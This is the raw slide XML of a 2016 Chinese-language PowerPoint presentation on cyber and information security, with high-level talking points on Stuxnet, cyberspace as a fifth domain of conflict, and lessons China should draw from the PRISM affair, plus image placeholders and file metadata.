          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1730375" y="2324826"/>
            <a:ext cx="9013825" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）网络安全中涉及政治安全是根本。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>美国总统大选，希拉里。。。。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）网络安全的另一个重要方面是网络与信息系统的安全。几年前，“震网”病毒使伊朗核设施受到大面积的破坏，显示出关键基础设施已经成为网络武器的真实攻击目标，有可能引发灾难性的后果。试想，在危机时刻，如果一个国家的涉及国民生计的关键基础设施被人攻击后瘫痪，设施军事指挥系统被人接管，那将是“国将不国”的局面。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628775" y="4263819"/>
            <a:ext cx="8597900" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>息安全形势的基本判断</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628775" y="4956317"/>
            <a:ext cx="9013825" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）世界各国</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>纷纷加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>强网络战备，网络空间剑拔弩张</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）当前，网络空间已经上升为与海，陆，空，太空并列的第五空间。世界各国高度重视加强网络战的攻防实力，发展各自的“网络威慑”能力。</a:t>
            </a:r>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）西方启动贸易保护安全壁垒，相关企业将受到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>重</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>大冲击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="144178884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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976437" y="1863161"/>
            <a:ext cx="8597900" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“棱镜门”事件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1768474" y="2756626"/>
            <a:ext cx="9013825" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）棱镜门验证了网络信息安全风险比以往时候更加严重</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）棱镜门事件折射出我国信息安全风险依然存在</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）棱镜门事件表明我国重要信息系统安全防护面临新的复杂形势</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）棱镜门事件验证了实体空间的大规模毁灭战争正在向网络空间大规模瘫痪战争转移</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10250" name="Picture 10" descr="http://www.cnii.com.cn/thingsnet/img/attachement/jpg/site2/20130723/00016c58d722135880802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92060" y="593524"/>
            <a:ext cx="3758030" cy="222102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文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976436" y="4084181"/>
            <a:ext cx="8597900" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>全新问题层出不穷</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976436" y="4864100"/>
            <a:ext cx="8805863" cy="1615005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="286074673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stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="139634" y="103806"/>
            <a:ext cx="901664" cy="736360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="http://cdn.lieyunwang.com/wp-content/uploads/2015/01/a58748cbd03016f-1024x68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31900" y="1512477"/>
            <a:ext cx="3187598" cy="2120013"/>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http://img.taopic.com/uploads/allimg/140808/235032-140PQ0291858.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9498" y="1482542"/>
            <a:ext cx="3162440" cy="2149948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8210" name="Picture 18" descr="http://i0.wp.com/overdope.com/wp-content/uploads/2014/10/20141002050337_11.jpg?fit=635%2C9999"/>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44841" y="3662426"/>
            <a:ext cx="4823515" cy="2581276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8214" name="Picture 22" descr="http://img1.cache.netease.com/catchpic/9/9C/9C85F47A6639A40C83115BF3F391BD8B.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31695" y="3632490"/>
            <a:ext cx="5513145" cy="261121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文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231695" y="609333"/>
            <a:ext cx="8597900" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>小伙伴</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>几张图，自己感受</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\Barry\AppData\Local\YNote\data\mengtao10@163.com\dab5338bdeb24aa8aff0f452084eab58\640.jpe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581938" y="1512477"/>
            <a:ext cx="3986418" cy="21463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62332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2685</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>228</Paragraphs>
  <Slides>34</Slides>
  <Notes>0</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>1</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 james</dc:creator>
  <cp:lastModifiedBy>41f2df2</cp:lastModifiedBy>
  <cp:revision>93</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-10-30T02:15:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-11T02:49:11Z</dcterms:modified>
</cp:coreProperties>
</file>